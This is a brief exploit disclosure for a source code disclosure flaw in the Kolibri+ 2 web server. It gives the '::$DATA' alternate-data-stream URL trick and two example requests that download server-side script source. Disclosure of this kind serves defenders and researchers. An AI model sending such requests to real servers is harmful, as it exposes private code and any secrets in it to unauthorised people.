################################################################################# # # # Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure # # aka: More fun with Kolibri+ 2 webserver # # Found By: Dr_IDE # # Tested On: Windows XPSP3 # # # ################################################################################# - Description - Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of the application available. This vulnerability is similar to the one reported earlier by Skull-HacKeR. Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure (download in this case) by the following means. - Technical Details - http://[ webserver IP]/[ file ][::$DATA] http://172.16.2.101/default.asp::$DATA http://172.16.2.101/index.php::$DATA